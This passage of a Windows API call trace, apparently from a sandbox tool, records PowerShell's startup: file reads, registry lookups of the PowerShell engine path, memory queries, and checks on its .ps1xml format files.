lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.105] GetLastError () returned 0x0 [0029.105] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.106] GetLastError () returned 0x0 [0029.106] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.106] GetLastError () returned 0x0 [0029.106] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.106] GetLastError () returned 0x0 [0029.106] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.106] GetLastError () returned 0x0 [0029.106] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.106] GetLastError () returned 0x0 [0029.106] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.106] GetLastError () returned 0x0 [0029.106] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.106] GetLastError () returned 0x0 [0029.107] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1b4, lpOverlapped=0x0) returned 1 [0029.107] GetLastError () returned 0x0 [0029.107] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x0, lpOverlapped=0x0) returned 1 [0029.107] GetLastError () returned 0x0 [0029.107] CloseHandle (hObject=0x334) returned 1 [0029.107] GetLastError () returned 0x0 [0029.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e314, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0029.107] GetLastError () returned 0x0 [0029.107] SetErrorMode (uMode=0x1) returned 0x1 [0029.107] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20ec688 | out: lpFileInformation=0x20ec688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0029.107] GetLastError () returned 0x0 [0029.107] SetErrorMode (uMode=0x1) returned 0x1 [0029.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0029.107] GetLastError () returned 0x0 [0029.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e738 | out: phkResult=0x24e738*=0x334) returned 0x0 [0029.107] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e780, lpData=0x0, lpcbData=0x24e77c*=0x0 | out: lpType=0x24e780*=0x1, lpData=0x0, lpcbData=0x24e77c*=0x56) returned 0x0 [0029.107] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e780, lpData=0xd2630, lpcbData=0x24e77c*=0x56 | out: lpType=0x24e780*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e77c*=0x56) returned 0x0 [0029.108] RegCloseKey (hKey=0x334) returned 0x0 [0029.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0029.108] GetLastError () returned 0x0 [0029.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0029.108] GetLastError () returned 0x0 [0029.218] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.242] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.244] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.244] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.244] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.244] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.245] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.248] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.256] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.257] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.257] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.257] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.257] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.258] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.258] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.258] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.263] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.268] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.268] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.269] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.269] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.270] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.271] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.271] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.271] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.272] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.272] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.272] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.273] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.273] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.275] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.279] VirtualQuery (in: lpAddress=0x24d678, lpBuffer=0x24e678, dwLength=0x1c | out: lpBuffer=0x24e678*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.279] VirtualQuery (in: lpAddress=0x24d678, lpBuffer=0x24e678, dwLength=0x1c | out: lpBuffer=0x24e678*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.279] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.281] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.310] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.310] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.311] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.325] GetLastError () returned 0xcb [0029.328] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.334] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.334] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.334] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.335] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.336] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.336] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.339] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.340] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.341] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e7fc | out: phkResult=0x24e7fc*=0x330) returned 0x0 [0029.341] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24e864, lpData=0x0, lpcbData=0x24e860*=0x0 | out: lpType=0x24e864*=0x1, lpData=0x0, lpcbData=0x24e860*=0x74) returned 0x0 [0029.341] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24e844, lpData=0x0, lpcbData=0x24e840*=0x0 | out: lpType=0x24e844*=0x1, lpData=0x0, lpcbData=0x24e840*=0x74) returned 0x0 [0029.342] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24e844, lpData=0xd2630, lpcbData=0x24e840*=0x74 | out: lpType=0x24e844*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24e840*=0x74) returned 0x0 [0029.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0029.342] GetLastError () returned 0xcb [0029.342] SetErrorMode (uMode=0x1) returned 0x1 [0029.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24e844 | out: lpFileInformation=0x24e844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0029.342] GetLastError () returned 0xcb [0029.342] SetErrorMode (uMode=0x1) returned 0x1 [0029.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.344] GetLastError () returned 0xcb [0029.344] SetErrorMode (uMode=0x1) returned 0x1 [0029.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0029.345] GetLastError () returned 0xcb [0029.345] SetErrorMode (uMode=0x1) returned 0x1 [0029.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0029.345] GetLastError () returned 0xcb [0029.345] SetErrorMode (uMode=0x1) returned 0x1 [0029.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0029.346] GetLastError () returned 0xcb [0029.346] SetErrorMode (uMode=0x1) returned 0x1 [0029.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.346] GetLastError () returned 0xcb [0029.346] SetErrorMode (uMode=0x1) returned 0x1 [0029.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0029.346] GetLastError () returned 0xcb [0029.346] SetErrorMode (uMode=0x1) returned 0x1 [0029.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.347] GetLastError () returned 0xcb [0029.347] SetErrorMode (uMode=0x1) returned 0x1 [0029.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0029.347] GetLastError () returned 0xcb [0029.347] SetErrorMode (uMode=0x1) returned 0x1 [0029.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0029.347] GetLastError () returned 0xcb [0029.347] SetErrorMode (uMode=0x1) returned 0x1 [0029.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0029.347] GetLastError () returned 0xcb [0029.347] SetErrorMode (uMode=0x1) returned 0x1 [0029.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0029.347] GetLastError () returned 0xcb [0029.347] SetErrorMode (uMode=0x1) returned 0x1 [0029.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, 